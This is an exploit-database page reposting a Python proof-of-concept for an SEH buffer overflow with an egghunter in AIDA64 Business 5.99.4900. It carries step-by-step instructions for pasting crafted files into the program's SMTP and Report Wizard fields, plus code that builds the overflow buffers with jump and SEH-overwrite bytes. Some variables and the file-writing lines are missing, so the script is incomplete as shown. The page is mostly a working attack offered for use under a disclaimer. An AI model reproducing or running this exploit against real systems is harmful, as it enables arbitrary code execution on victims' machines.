Aida64 business 5.99.4900 seh buffer overflow (egghunter) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-04-03 |
Type : local |
Platform : windows
This exploit / vulnerability Aida64 business 5.99.4900 seh buffer overflow (egghunter) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python #
# Exploit Title: AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter) #
# Date: 2019-04-01 #
# Vendor Homepage: #
# Software Link: #
# Mirror Link : #
# Exploit Author: Peyman Forouzan #
# Tested Version: 5.99.4900 #
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Special Thanks to my wife #
# The program has SEH Buffer Overflow in several places.(this code show one of them) #
# Note 1 : To optimize code, I've used a "stack pivot" that is the same in #
# (Extreme, Engineer, Network Audit) Editions. #
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900 #
# But the stack pivots in Business Edition are different. #
# Note 2 : All the old versions of the program that are available on the sites like, #
# or in #
# have the same vulnerabily in different offsets (for example version 5.70.3800 ) #
# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : ( Three files are created ) #
# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt #
# into "Display name" --> Ok #
# 3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next #
# --> Wait a minute --> Shellcode (Calc) open #
jmpback = "\xe9\xdc\xfe\xff\xff" # jmp back
nseh = "\xeb\xf9\x90\x90" # jmp Short back
seh = "\x50\x15\x40" # Overwrite Seh - Golden Pivot !! - Works on all Editions
buffer = egghunter
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)
f = open ("egghunter-winxp-win7.txt", "w")
print "[+] File created!"
buffer = egghunter10
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)
f = open ("egghunter-win10.txt", "w")
print "[+] File created!"
Aida64 business 5.99.4900 seh buffer overflow (egghunter)